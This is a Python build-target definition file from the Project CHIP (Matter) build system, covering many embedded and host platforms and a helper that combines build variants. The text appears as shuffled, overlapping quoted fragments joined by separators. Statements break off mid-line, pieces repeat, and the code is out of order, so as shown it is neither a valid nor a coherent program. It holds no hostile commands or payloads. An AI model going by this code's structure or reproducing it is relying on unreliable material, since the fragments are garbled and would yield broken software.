target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in", "list \"\"\" available = set([item.name for item in items]) for", "yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for debugging purpose - '", "to accepted variants. Arguments are construction variants to BuildVariant. Example", "Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target = Target('imx',", "satisfied for all items in the given list \"\"\" available", "self.name = name self.validator = validator self.conflicts = conflicts self.buildargs", "= [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(),", "proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets(): target =", "def IMXTargets(): target = Target('imx', IMXBuilder) yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield", "purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for", "enable_flashbundle: bool): builder = self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target =", "for globs name = '-'.join([o.name for o in subgroup]) if", "x64 linux supports cross compile cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux')", "in builder.AllVariants(): yield target def Bl602Targets(): target = Target('bl602', Bl602Builder)", "AndroidApp, AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739", "'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light',", "target. \"\"\" def __init__(self, targets: List[Target] = []): # note", "= target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets = [target_native] # x64 linux supports", "app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP)", "# builds is exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True)", "'Reduce default build variants') yield variant_target def HostTargets(): target =", "yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev') else: yield target", "enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK)", "potential builds is exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False)", "efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'),", "target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target", "app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target in app_targets: yield target.Extend('release',", "for v in self.variants if v.validator.Accept(target.name)] # Build every possible", "MbedBoard, MbedBuilder, MbedProfile from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from", "app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock',", "Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out", "limitations under the License. import os from itertools import combinations", "all variants, so variants are generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def", "OR CONDITIONS OF ANY KIND, either express or implied. #", "user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only", "the License is distributed on an \"AS IS\" BASIS, #", "in target.name): # Single-variant builds yield target else: builder.targets.append(target) for", "'-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants(): yield", "use and what arguments are required to produce the specified", "builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w import K32WApp, K32WBuilder", "combinations from typing import List from builders.ameba import AmebaApp, AmebaBoard,", "import InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w import K32WApp, K32WBuilder from", "List[BuildVariant]) -> bool: for a, b in combinations(items, 2): if", "variant to be allowed for globbing. By default we do", "yield rpc def AndroidTargets(): target = Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool',", "+= \"-\" + suffix clone.create_kw_args.update(kargs) return clone def Create(self, runner,", "yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release',", "available: return False return True class VariantBuilder: \"\"\"Handles creating multiple", "Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield", "board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer)", "law or agreed to in writing, software # distributed under", "yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible build variants.", "requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user", "all' to select all variants, so variants are generally glob-blacklisted.", "potential # builds is exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']),", "target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for debugging purpose", "self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields a list of acceptable variants", "Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT)", "build it (what builder class to use and what arguments", "in generator: ALL.append(target) # Simple targets added one by one", "from builders.host import HostApp, HostBoard, HostBuilder from builders.infineon import InfineonApp,", "QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield", "in name: return True return False class BuildVariant: def __init__(self,", "may obtain a copy of the License at # #", "board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def QorvoTargets(): target = Target('qpg', QpgBuilder) yield", "# because libreadline is not part of the default sysroot", "Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of XIP flash space\") yield", "2): if (a.name in b.conflicts) or (b.name in a.conflicts): return", "app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock',", "Arguments are construction variants to BuildVariant. Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False)", "builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self, reason): clone = self.Clone() if", "how to build it (what builder class to use and", "app=NrfApp.PUMP_CONTROLLER) rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True) if '-nrf5340dk-' in rpc.name:", "in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS) def", "Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def QorvoTargets(): target = Target('qpg',", "may not use this file except in compliance with the", "allowed for globbing. By default we do not want a", "produce the specified build) \"\"\" def __init__(self, name, builder_class, **kwargs):", "this file except in compliance with the License. # You", "= Target('imx', IMXBuilder) yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield", "from builders.efr32 import Efr32App, Efr32Board, Efr32Builder from builders.esp32 import Esp32App,", "Has a name identifier plus parameters on how to build", "'-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False),", "subgroup]) if name not in self.glob_whitelist: if not variant_target.IsGlobBlacklisted: variant_target", "\"\"\" Whitelist the specified variant to be allowed for globbing.", "# # Licensed under the Apache License, Version 2.0 (the", "repository_path, runner=runner, **self.create_kw_args) builder.target = self builder.identifier = self.name builder.output_dir", "what arguments are required to produce the specified build) \"\"\"", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS)", "Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user", "app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL))", "target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target = Target('mbed', MbedBuilder) targets", "from itertools import combinations from typing import List from builders.ameba", "board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer)", "= Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105,", "from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder from builders.android import AndroidApp,", "the default sysroot yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev')", "self.validator = validator self.conflicts = conflicts self.buildargs = buildargs self.requires", "globbing. By default we do not want a 'build all'", "'-tests', board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield", "target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(),", "used self.targets = targets[:] self.variants = [] self.glob_whitelist = []", "if requirement not in available: return False return True class", "TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a", "in subgroup]) if name not in self.glob_whitelist: if not variant_target.IsGlobBlacklisted:", "for board in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests', board=board,", "app=Efr32App.LOCK)) # Possible build variants. Note that number of potential", "app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets = [", "parameters on how to build it (what builder class to", "TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a consistent order overall ALL.sort(key=lambda", "or implied. # See the License for the specific language", "builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets: if ('-rpc-console' in target.name) or", "clone def Extend(self, suffix, **kargs): \"\"\"Creates a clone of the", "app=NrfApp.UNIT_TESTS) targets = [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] #", "esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc',", "Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL)", "app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters',", "Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of XIP flash space\")", "NOTE: The number of potential builds is exponential here. builder", "AllRequirementsMet(subgroup): continue # Target ready to be created - no", "return True return False def AllRequirementsMet(items: List[BuildVariant]) -> bool: \"\"\"", "of acceptable variants for the given targets. Handles conflict resolution", "NrfBoard, NrfConnectBuilder from builders.qpg import QpgApp, QpgBoard, QpgBuilder from builders.telink", "['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'],", "variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE,", "so variants are generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def AppendVariant(self, **args):", "builder.AllVariants(): yield target def NrfTargets(): target = Target('nrf', NrfConnectBuilder) yield", "VariantBuilder: \"\"\"Handles creating multiple build variants based on a starting", "HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target", "target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS))", "target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target", "Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target =", "yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE,", "app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)", "yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc", "app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield", "target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand build\") def cc13x2x7_26x2x7Targets(): target", "efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only", "the given list \"\"\" available = set([item.name for item in", "esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only',", "target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if", "[] self.glob_whitelist = [] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the", "do not want a 'build all' to select all variants,", "board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL)", "AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ] for", "MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = []", "CHIP Authors # # Licensed under the Apache License, Version", "targets[:] self.variants = [] self.glob_whitelist = [] def WhitelistVariantNameForGlob(self, name):", "rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True) if '-nrf5340dk-' in rpc.name: rpc", "= [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = [] for target", "if HasConflicts(subgroup): continue if not AllRequirementsMet(subgroup): continue # Target ready", "board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer)", "AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(),", "InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w import K32WApp, K32WBuilder from builders.mbed", "for subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue if not", "def GlobBlacklist(self, reason): clone = self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason +=", "debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target = Target('infineon',", "if '-nrf5340dk-' in rpc.name: rpc = rpc.GlobBlacklist( 'Compile failure due", "app=Bl602App.LIGHT) def IMXTargets(): target = Target('imx', IMXBuilder) yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL)", "devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target", "Bl602Board, Bl602Builder from builders.imx import IMXApp, IMXBuilder class Target: \"\"\"Represents", "Efr32Builder from builders.esp32 import Esp32App, Esp32Board, Esp32Builder from builders.host import", "the specified build) \"\"\" def __init__(self, name, builder_class, **kwargs): self.name", "True class AcceptNameWithSubstrings: def __init__(self, substr: List[str]): self.substr = substr", "a.conflicts): return True return False def AllRequirementsMet(items: List[BuildVariant]) -> bool:", "yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE,", "every possible variant for variant_count in range(1, len(ok_variants) + 1):", "yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS)", "suffix: appended with a \"-\" as separator to the clone", "generator in target_generators: for target in generator: ALL.append(target) # Simple", "to proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets(): target", "extra build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield", "Extend(self, suffix, **kargs): \"\"\"Creates a clone of the current object", "yield target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on", "def QorvoTargets(): target = Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK)", "InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield", "builder.identifier = self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder", "build parameters. Arguments: suffix: appended with a \"-\" as separator", "List[str] = [], requires: List[str] = [], **buildargs): self.name =", "build variants. # NOTE: The number of potential builds is", "from builders.tizen import TizenApp, TizenBoard, TizenBuilder from builders.bl602 import Bl602App,", "esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc", "AmebaBoard, AmebaBuilder from builders.android import AndroidApp, AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7", "= [target_native] # x64 linux supports cross compile cross_compile =", "== 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64))", "requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user", "board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST)", "= Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK,", "items]) for item in items: for requirement in item.requires: if", "in self.substr: if s in name: return True return False", "name = '-'.join([o.name for o in subgroup]) if name not", "be allowed for globbing. By default we do not want", "'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for debugging purpose -", "app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield", "Add another variant to accepted variants. Arguments are construction variants", "yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def QorvoTargets(): target =", "yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce", "in writing, software # distributed under the License is distributed", "variant_count): if HasConflicts(subgroup): continue if not AllRequirementsMet(subgroup): continue # Target", "self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone def Extend(self, suffix,", "not None @property def GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def", "build variants based on a starting target. \"\"\" def __init__(self,", "\"-\" + suffix clone.create_kw_args.update(kargs) return clone def Create(self, runner, repository_path:", "board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle for all-clusters and", "License is distributed on an \"AS IS\" BASIS, # WITHOUT", "License, Version 2.0 (the \"License\"); # you may not use", "required to produce the specified build) \"\"\" def __init__(self, name,", "'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug',", "\"\"\" def __init__(self, name, builder_class, **kwargs): self.name = name self.builder_class", "requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user", "self.glob_blacklist_reason is not None @property def GlobBlacklistReason(self): return self.glob_blacklist_reason class", "requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user", "target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64,", "in self.glob_whitelist: if not variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce default", "the License for the specific language governing permissions and #", "from builders.bl602 import Bl602App, Bl602Board, Bl602Builder from builders.imx import IMXApp,", "target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64,", "builder class to use and what arguments are required to", "Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor',", "to pw_build args not forwarded to proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760')", "target in builder.AllVariants(): if cross_compile and 'chip-tool' in target.name and", "= [], **buildargs): self.name = name self.validator = validator self.conflicts", "target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner',", "to build it (what builder class to use and what", "def IsGlobBlacklisted(self): return self.glob_blacklist_reason is not None @property def GlobBlacklistReason(self):", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "self.buildargs = buildargs self.requires = requires def HasConflicts(items: List[BuildVariant]) ->", "variants are generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\"", "target # skip variants that do not work for this", "not work for this target ok_variants = [ v for", "enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC)", "target = Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light',", "app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder =", "targets: List[Target] = []): # note the clone in case", "for globbing. By default we do not want a 'build", "True return False def AllRequirementsMet(items: List[BuildVariant]) -> bool: 